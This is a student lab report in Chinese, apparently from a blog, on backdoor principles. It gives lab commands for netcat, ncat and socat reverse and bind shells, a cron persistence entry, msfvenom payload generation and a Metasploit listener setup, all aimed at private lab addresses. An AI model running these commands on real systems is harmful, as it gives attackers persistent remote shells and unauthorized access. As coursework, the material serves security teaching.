Exp2 后门原理与实践

Exp2 后门原理与实践


实验环境:win7-64bit kali-64bit


基础问题

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    下载破解版游戏的时候,有些后门会被发现被杀毒软件提醒阻止。但是有些可能未被发现,就顺利进入到我的系统中。

2.例举你知道的后门如何启动起来(win及linux)的方式?
伪装成系统文件自启动。
通过win的任务计划或linux的cron定时开启
通过运行相关脚本或软件触发

3.Meterpreter有哪些给你映像深刻的功能?
可以记录键盘和抓取屏幕,如果系统定时抓取屏幕,并记录键盘信息,可以很容易就分析得到我的密码

4.如何发现自己有系统有没有被安装后门?
使用杀毒软件。
查看端口,看是否有异常操作。


实践

预备任务

  1. 在Windows中需要载ncat.rar,解压后即可使用

  2. 利用命令行进入刚刚解压ncat的目录。

  3. 利用 ncat.exe -l -p 5329 命令打开端口号为5329的端口

  4. 利用nc 192.168.247.138 5329 -e /bin/sh 在Linux反弹连接windows。

linux获得window shell

  1. Linux获得Windows Shell的过程同理,在Linux运行监听指令:nc -l -p 5329 打开端口

  2. 利用ncat.exe -e cmd.exe 192.168.247.138 指令Windows反弹连接Linux

任务一:使用netcat获取主机操作Shell,cron启动

  1. 首先在Windows中下载scat,解压

  2. 使用crontab -e命令编辑配置文件,在最后一行或第一行添加指令35 * * * * /bin/netcat 192.168.247.138 5329 -e /bin/sh

任务二:使用socat获取主机操作Shell, 任务计划启动

  1. 在windows中,右键单击计算机,打开管理->系统工具->任务计划程序,单击创建基本任务,填写任务名称,设置触发器为当前用户登录时,设置操作为启动程序,选择启动程序为socat.exe,参数设置为tcp-listen:5329 exec:cmd.exe,pty,stderr
  2. 作用是把cmd绑定到端口5329,同时把cmd的Stderr复位向到stdout

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. 在kali中利用如下命令创建一个名为5329的后门程序
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.138 LPORT=5329 -f exe > 20155329.exe
  1. 2.将其通过ncat,传送到主机,在Windows中使用命令ncat.exe -l 5329 > 20155329.exe,在Kali中使用命令:nc 192.168.247.137 5329 < 20155329.exe,这样就传送过来了。
  2. MSF打开监听,输入如下指令
  • msfconsole
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.247.137
  • set LPORT 5329
  • show options
  • exploit
  1. 在win7打开生成5329.exe的程序,回到kali,终端提示
  2. 尝试使用命令dir,成功显示windows中的文件夹

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权


实验感想:

  • 实验整体不难,虽然过程中被大佬狠狠的鄙视了一把。但是做成功了还是很开心,在这次实验中遇见的问题还是有的,比如说虚拟机黑屏一直打不开,电脑系统复位后才能正常使用等,最后成功之后一直忘记写实验报告等,在实验过程中突然觉得电脑这东西好不安全,以后看样子得把摄像头麦克风等设备不需要时,物理的去让他关闭。确保安全,以防发生帅照被流出的严重后果。以后在网上下载东西 点开网页时得注意了,多留心
原文地址:https://www.cnblogs.com/hpl20155329/p/8698634.html